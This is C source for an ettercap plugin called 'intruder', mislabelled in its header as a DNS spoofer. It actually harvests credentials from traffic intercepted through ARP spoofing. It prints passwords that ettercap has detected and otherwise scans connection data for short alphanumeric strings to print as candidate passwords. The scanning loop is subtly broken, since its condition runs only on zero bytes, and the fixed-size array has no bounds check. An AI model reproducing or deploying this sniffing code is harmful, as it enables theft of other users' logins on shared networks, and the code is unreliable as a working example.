/*
    intruder -- ettercap plugin -- spoof DNS requests

    Copyright (C) 2001  NaGoR
    
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.

    $Id: intruder.c,v 0.1 2007/06/02  sha0@BadCheckSum.com  Exp $
*/



#ifdef CYGWIN
   #include <windows.h>
   #include <winsock2.h>
#else
   #include <sys/time.h>
   #include <unistd.h>
   #include <sys/types.h>
   #include <netinet/in.h>
#endif


#include "../../src/include/ec_main.h"
#include "../../src/include/ec_version.h"
#include "../../src/include/ec_plugins.h"
#include "../../src/include/ec_inet_structures.h"
#include "../../src/include/ec_inet.h"
#include "../../src/include/ec_inet_forge.h"
#include "../../src/include/ec_error.h"
#include "../../src/include/ec_parser.h"
#include "../../src/include/ec_queue.h"

#include <string.h>
#include <stdlib.h>
#include <sys/param.h>
//#include <arpa/nameser.h>
//#include <resolv.h>

int Plugin_Init(void *);
int Plugin_Fini(void *);
int intruder (void *);

struct plugin_ops intruder_ops = {
	ettercap_version: VERSION,
	plug_info:	"Capture user and password",
	plug_version:	1,
	plug_type:	PT_HOOK,
	hook_point:	PCK_DISSECTOR,
	hook_function:	&intruder,
};

int Plugin_Init(void *params) {
	return Plugin_Register(params, &intruder_ops);
}

int Plugin_Fini(void *params) {
	return 0;
}

struct pwd{
	char *ptr;
	int len;
};

struct pwd pass[10];

int intruder (void *data) {
	DISSECTION *d = (DISSECTION *)data;
	char *buff;
	char passwd[11];
	int top_pass=0;
	int init_pass=0;
	int i;
	

	// Initial checks

	if (number_of_connections < 1)  {
		Plugin_Output("Not enought connections\n\n");
		return -1;
	}

	if (!Options.arpsniff) {
		Plugin_Output("Not in arp spoof mode\n\n");
		return -2;
	}


	if (strlen(d->connection->user) == 0 && strlen(d->connection->pass) == 0) {

		// Look for potential passwords at data field of the connection, and points some pwd structs to
		// them. If there is a printable byte, is pointed by the structure and every byte increments the
		// len field of the password. If a non printable byte appears or there are more than 8 alphanumeric 
		// bytes, the len counter stops and jumps to the next password.
		buff = d->connection->DataBuffer;
		while (!*buff) {
					
			if (isalpha((int)*buff) || isdigit((int)*buff)) {
				if (!init_pass) {
					init_pass=1;	//A password starts here mark
					pass[top_pass].ptr = buff;
					pass[top_pass].len = 0;
				}
				pass[top_pass].len++;
				if (pass[top_pass].len > 8) {
					init_pass=0;	//The end of the password
					top_pass++;
				}

			} else {
				init_pass=0;
				top_pass++;
			}
		
			buff++;
		}

		// Display all the pontential passwords, notice that if a word has 8 or more bytes, is not 
		// considered a password.
		for (i=0; i<top_pass; i++) {
			if (pass[i].len < 8) {
				bzero ((char *)passwd,sizeof(passwd));
				memcpy ((char *)passwd, pass[i].ptr, pass[i].len);
				Plugin_Output("Pass: %s \n",passwd);
			} 
		}
		
	
	} else {

		// If the active disertor has detected a password it is displayed.

		if (strlen(d->connection->user)>0)
			Plugin_Output("Username: %s\n",d->connection->user);

		if (strlen(d->connection->pass)>0)
			Plugin_Output("Password: %s\n",d->connection->pass);

	}
	
		
	return 1;	
}